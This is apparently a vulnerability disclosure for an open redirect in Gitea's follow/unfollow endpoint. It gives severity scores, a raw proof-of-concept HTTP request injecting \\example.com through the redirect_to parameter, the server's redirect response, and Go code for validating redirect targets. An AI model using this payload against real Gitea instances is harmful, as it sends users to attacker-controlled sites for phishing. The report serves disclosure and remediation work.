CVSS3: 4.4 Medium
Attack Vector: NETWORK
Attack Complexity: HIGH
Privileges Required: LOW
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N

CVSS2: 3.6 Low
Access Vector: NETWORK
Access Complexity: HIGH
Authentication: SINGLE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: NONE
Vector: AV:N/AC:H/Au:S/C:P/I:P/A:N

EPSS: 0.0004 Low
Percentile: 12.3%
The idea is similar to CVE-2022-1058 ( https://huntr.dev/bounties/4fb42144-ac70-4f76-a5e1-ef6b5e55dc0d/ ).
Browsers interpret \\example.com as https://example.com, which leads to an open redirect.
The vulnerable API is the follow/unfollow action on a user's profile.
To reproduce the bug quickly:
Vulnerable parameter: redirect_to
POST /admin123?action=follow&redirect_to=\\example.com HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Origin: null
Connection: close
Cookie: i_like_gitea=7c60991704df67dd; lang=en-US; _csrf=kxOfYgnfpMMIT6mWaCfzPYRHdI46MTY4NjA0MjMxNDcwMTE0ODY5OQ
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
_csrf=kxOfYgnfpMMIT6mWaCfzPYRHdI46MTY4NjA0MjMxNDcwMTE0ODY5OQ
Response from server:
HTTP/1.1 302 Found
Location: /\\example.com
Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
Date: Wed, 07 Jun 2023 07:32:30 GMT
Content-Length: 0
Connection: close
After a successful POST request the user is redirected to example.com: the Location header is set to /\\example.com, which the browser interprets as a redirect to //example.com (a protocol-relative URL pointing at an external host).
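As an added example (not Gitea's own code), the check a handler could run on the raw redirect_to value before building the Location header; it treats a backslash like a forward slash, as the browser does, so \\example.com, /\\example.com and //example.com are all rejected while an in-site path is kept. The function names and the fallback target are assumptions.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// IsSafeLocalRedirect reports whether target may be used as an in-site
// redirect. Hypothetical helper: browsers normalise "\" to "/" in the
// authority position, so "\\host" and "/\\host" become "//host", a
// protocol-relative URL that leaves the site. Only a single-leading-slash
// path with no scheme or host is accepted.
func IsSafeLocalRedirect(target string) bool {
	if target == "" {
		return false
	}
	// Mirror the browser's normalisation before inspecting the prefix.
	normalised := strings.ReplaceAll(target, `\`, "/")
	// Exactly one leading slash: "//..." would be scheme-relative.
	if !strings.HasPrefix(normalised, "/") || strings.HasPrefix(normalised, "//") {
		return false
	}
	// url.Parse also rejects control characters (CR/LF header tricks).
	u, err := url.Parse(normalised)
	if err != nil || u.Scheme != "" || u.Host != "" || u.Opaque != "" {
		return false
	}
	return true
}

// SafeRedirectTarget returns target if it passes the check, otherwise the
// fallback, so the handler never echoes a rejected value into Location.
func SafeRedirectTarget(target, fallback string) string {
	if IsSafeLocalRedirect(target) {
		return target
	}
	return fallback
}

func main() {
	// Constructed sample inputs, including the form from the report above.
	for _, t := range []string{`\\example.com`, `/\\example.com`, "//example.com", "https://example.com", "/user/repo?tab=followers"} {
		fmt.Printf("%-28q -> %v\n", t, IsSafeLocalRedirect(t))
	}
}
```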